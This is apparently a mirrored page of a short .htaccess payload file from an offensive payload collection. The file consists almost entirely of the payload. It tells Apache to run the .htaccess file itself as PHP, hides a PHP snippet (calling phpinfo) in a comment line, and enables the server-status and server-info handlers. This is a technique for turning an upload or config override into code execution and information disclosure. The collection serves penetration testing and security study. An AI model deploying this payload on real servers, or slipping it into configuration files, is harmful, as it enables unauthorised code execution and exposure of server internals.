mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-04-22 15:03:08 +02:00
5 lines
113 B
Text
5 lines
113 B
Text
AddType application/x-httpd-php .htaccess
|
|
# <?php phpinfo(); ?>
|
|
SetHandler server-status
|
|
SetHandler server-info
|
|
|